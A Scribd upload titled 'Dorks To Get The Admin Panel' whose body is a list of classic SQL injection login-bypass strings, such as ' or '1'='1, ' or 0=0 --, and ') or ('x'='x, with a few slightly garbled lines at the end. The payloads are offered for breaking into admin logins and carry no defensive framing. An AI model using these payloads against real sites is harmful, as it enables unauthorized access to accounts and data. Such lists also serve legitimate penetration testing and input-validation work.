0% found this document useful (0 votes)
1K views2 pages

Dorks To Get The Admin Panel

The document contains various SQL injection test strings attempting to exploit vulnerabilities through insertion of conditional statements into queries. Specifically, it includes single and double quoted strings containing equality conditions for variables like 'x' and 'a' that will always evaluate to true, as well as numbers like 1 that are equal to themselves.

Uploaded by

FarooqHaiderButt
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as RTF, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
1K views2 pages

Dorks To Get The Admin Panel

The document contains various SQL injection test strings attempting to exploit vulnerabilities through insertion of conditional statements into queries. Specifically, it includes single and double quoted strings containing equality conditions for variables like 'x' and 'a' that will always evaluate to true, as well as numbers like 1 that are equal to themselves.

Uploaded by

FarooqHaiderButt
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as RTF, PDF, TXT or read online on Scribd
You are on page 1/ 2

' or '1'='1

' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 -'or'1=1'

================================================
and 1=1-and 1=1

You might also like